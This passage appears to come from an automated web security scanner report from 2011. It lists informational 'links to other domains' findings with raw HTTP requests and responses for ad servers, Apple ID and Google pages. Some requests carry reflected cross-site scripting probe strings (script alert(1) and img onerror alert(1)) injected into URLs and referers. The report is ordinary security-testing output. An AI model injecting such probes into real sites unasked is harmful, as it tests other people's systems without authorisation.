...[SNIP]...
<noscript><a href="http://ads.brand.net/charon/adrequest?jump/bnet.C1401/P1265;ab=nil;gb=nil;hb=nil;gc=US;gs=nil;gd=nil;tods=nil;tode=nil;tf=5;tp=10;dow=nil;atf=nil;cg=40;at=10;rt=nil;af=10;il=5501;sz=728x90;tile=1;u=il-5501;ae=20;ord=1296498974401?" target="_blank"><img src="http://ads.brand.net/charon/adrequest?ad/bnet.C1401/P1265;ab=nil;gb=nil;hb=nil;gc=US;gs=nil;gd=nil;tods=nil;tode=nil;tf=5;tp=10;dow=nil;atf=nil;cg=40;at=10;rt=nil;af=10;il=5501;sz=728x90;tile=1;u=il-5501;ae=20;ord=1296498974401?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...

18.9. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 238

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.trafficmp.com/a/js?plid=23661"></script>
...[SNIP]...

18.10. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-1482036_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5277

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,136 Template Name = #Flash -IBV & Produc
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%3B%7Esscs%3D%3fhttp://www.overstock.com/?cid=149848"><IMG SRC="http://s0.2mdn.net/1787227/30-300x250-General.jpg" alt="" BORDER=0></A>
...[SNIP]...

18.11. http://app.scanscout.com/ssframework/adStreamJSController.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:39:38 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: userCookie=2a3f421f33e5217b5b3498a1f9e65e25; Domain=.scanscout.com; Expires=Sun, 31-Jan-2021 21:39:38 GMT; Path=/
Set-Cookie: uniques=110203|626_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:39:38 GMT; Path=/
Set-Cookie: psh=626_1296769178181; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:39:38 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203|32_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:39:38 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7533


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="preroll-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5945286</AdTitle>
<Impression>
<
...[SNIP]...
doubleclick.net/adi/N5895.126578.TREMORMEDIA/B5140048.2;sz=300x250;ord=724671368?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5895.126578.TREMORMEDIA/B5140048.2;abr=!ie;sz=300x250;ord=724671368?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N5895.126578.TREMORMEDIA/B5140048.2;abr=!ie4;abr=!ie5;sz=300x250;ord=724671368?" onClick="var i= new Image(1,1); i.src='http://l0.scanscout.com/ssframework/log/log.png?a=logitemaction&RI=730292&CbC=1&CbF=true&EC=0&RC=0&SmC=2&CbM=b22%2F1&admode=preroll&VI=33687174&PRI=2143757566&VC=0&Uzip=N%2FA&RprC=0&ADsn=9&VcaI=96%2C192%2C200&RrC=1&VgI=26d91cdf5493d1dd943311e83ddb679d&AVI=56558&Ust=dc&Uctry=us&AC=4&CI=1426196&PI=626&CC=0&Udma=511&ADI=5945286&VmC=0&VscaI=96&VclF=true&PC=1';" target="_blank">
<IMG SRC="http://ad.doubleclick.net/ad/N5895.126578.TREMORMEDIA/B5140048.2;abr=!ie4;abr=!ie5;sz=300x250;ord=724671368?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

18.12. http://app.scanscout.com/ssframework/adStreamJSController.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:34 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; Domain=.scanscout.com; Expires=Sun, 31-Jan-2021 21:07:34 GMT; Path=/
Set-Cookie: uniques=110203|626_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: psh=626_1296767254411; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203|32_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7224


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="preroll-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5945246</AdTitle>
<Impression>
<
...[SNIP]...
<noscript><a href="http://clk.atdmt.com/AVE/go/285974183/direct;wi.300;hi.250/01/" onClick="var i= new Image(1,1); i.src='http://l0.scanscout.com/ssframework/log/log.png?a=logitemaction&RI=730230&CbC=1&CbF=true&EC=0&RC=0&SmC=2&CbM=b25%2F1&admode=preroll&VI=33687174&PRI=1386067554&VC=0&Uzip=N%2FA&RprC=0&ADsn=1&VcaI=96%2C192%2C200&RrC=1&VgI=26d91cdf5493d1dd943311e83ddb679d&AVI=57872&Ust=dc&Uctry=us&AC=4&CI=1426141&PI=626&CC=0&Udma=511&ADI=5945246&VmC=0&VscaI=96&VclF=true&PC=1';" target="_blank"><img border="0" src="http://view.atdmt.com/AVE/view/285974183/direct;wi.300;hi.250/01/" /></a>
...[SNIP]...

18.13. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appleid.apple.com
Path:   /cgi-bin/WebObjects/MyAppleId.woa

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1
Host: appleid.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:04:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7l
set-cookie: ISTLocale=ZW5fVVM%3D; version=1; expires=Fri, 03-Feb-2012 18:04:29 GMT; path=/
connection: close
content-length: 24701
MS-Author-Via: DAV
Content-Type: text/html; charset=UTF-8;

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...
</head>

   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/yahoo-dom-event/yahoo-dom-event.js"></script>
   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/animation/animation-min.js"></script>
   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/datasource/datasource-min.js"></script>
   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/autocomplete/autocomplete-min.js"></script>
...[SNIP]...
<div id="preloads">
    <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_createid_left_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_createid_right_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_createid_left_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_createid_right_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_createid_left_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_createid_right_active_20091125.png" />    
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_left_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_left_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_left_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_right_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_right_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_right_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_left_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_left_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_left_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_right_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_right_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_left_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_left_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_left_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_right_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_right_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_greypill_left_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_greypill_left_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_greypill_left_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_greypill_right_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_greypill_right_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_greypill_right_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_download_left_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_download_right_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_download_left_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_download_right_over_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_download_left_active_20091125.png" />
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_download_right_active_20091125.png" />    
       <img src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_check_20091125.png" />    
       <img scr="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_verified.png" />
...[SNIP]...
<h2><img alt="My Apple ID" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/en_US/myappleid_title_20091125.png" /></h2>
...[SNIP]...
<li><img alt="" width="20" height="21" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_globe_20091125.png" /></li>
...[SNIP]...
<div class="column first">
                   <img alt="iTunes" width="54" height="42" class="left" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_index_itunes_20091125.png" />
                   <p class="intro">
...[SNIP]...
<div class="column last">
                   <img alt="iChat" width="54" height="42" class="left" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_index_ichat_20091125.png" />
                   <p class="intro ichat">
...[SNIP]...
<div class="column first">
                   <img alt="Mobile Me" width="54" height="42" class="left" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_index_mobileme_20091125.png" />
                   <p class="intro">
...[SNIP]...
<div class="column last">
                   <img alt="iChat" width="54" height="42" class="left" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_index_store_20091125.png" />
                   <p class="intro">
...[SNIP]...
<div class="column first">
                   <img alt="Apple Retail Stores" width="54" height="42" class="left" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_index_retail_20091125.png" />
                   <p class="intro">
...[SNIP]...
<div class="column last">
                   <img alt="iChat" width="54" height="42" class="left" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/myappleid_index_support_20091125.png" />
                   <p class="intro">
...[SNIP]...
<div id="preload">
        <img width="1" height="1" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/button_bigblue_rightcap_mouseover20091102.gif" />    
        <img width="1" height="1" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/myappleid/images/common/button_bigblue_leftcap_mouseover20091102.gif" />
       </div>
...[SNIP]...

18.14. http://blogsearch.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?hl=en&tab=wb HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:24 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=9110429964e5ee49:TM=1296765084:LM=1296765084:S=2AQUpWeOnhnE5vja; expires=Sat, 02-Feb-2013 20:31:24 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=b1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="imgget" style="display:none"><img id="g_cl_0" src="http://lh5.googleusercontent.com/public/kTAHcfvWpIeQ78u7e2T8tckGITFfUtdXWYclphNBYYHB5CNtORNbMKhCuRATDzKOEqaFJ4B95xahoO2c-uj5V7NZC4CgSwJ-q3DWgqR9ddNRAplwT0muhhUaPAc8avMmHryMVhfbN77Med8"/><img id="g_cl_1" src="http://lh4.googleusercontent.com/public/3lyVNOrMKJbKabe4KWslYxuV36sda3SWG7CBRT0Zs6zsbGc7lPHzByIP2MZ-rijycjFL_Wx08DAeEQHP_DrBtyyg6lcgd7cqYVi6V5Bzhjjpx3MBjFFMa3275gGY909yrsMWzSIsS8uqX2WBspQYAZVb8cqkbs93cg"/><img id="g_cl_2" src="http://lh5.googleusercontent.com/public/BUd6ezh1tHocHsyXHSC-DbUwQNWaOhbqgvA5p12Ek5_Rd_WgGqHgOyYHyAQB1p0yQXkAPvY_fjBl2U5F_KSiBfWbd0AzV0PM23L6b-smsXTP2-0SPmTuIcxL0gHML6pd01-u1QVMoXKHyPkurTpDFswSasZ-aunUjszUJoi3nPUqcBen4FXU28PW0bseXg63qHU"/><img id="g_cl_3" src="http://lh5.googleusercontent.com/public/7zY9WypCeIEVHmlpSsEcwpLWOPc-avrAI4RZZrMQaB0YsvnDi0Vc2mqg0cjShtfkibuuOGlujcQ45xbYO5WiTrNuogsw4bDPwCAKntuV8xUSBv4zrHhF93_0AjlvKF0dcWCwB3dEJKUf5tHT5Q5alaOlblU"/><img id="g_cl_4" src="http://lh3.googleusercontent.com/public/XESi2ooSfdIhJG2RdAGTBhRG9qS4Eb_MWv_4aiqVUzk-0mCKs5NdsnSKuvQAVbNghO3B8qvsMGUi8uXP1tg6RZCmb4A8xhY0FYAdZLnLJ2OLQWSG_ocNmxLCalOf7dEz2mN-s3gsDPQm9QQfLCHaU_QAizM"/></div>
...[SNIP]...

18.15. http://boardreader.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?a=a&x=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</a>&nbsp;|&nbsp;
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

18.16. http://books.google.com/bkshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bkshp?hl=en&tab=wp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:06 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=69d7e4c3c862f6e6:TM=1296765126:LM=1296765126:S=j59zbMnPkpz9yImG; expires=Sat, 02-Feb-2013 20:32:06 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=p1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a> - <a href=http://booksearch.blogspot.com/><nobr>
...[SNIP]...

18.17. http://books.google.com/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

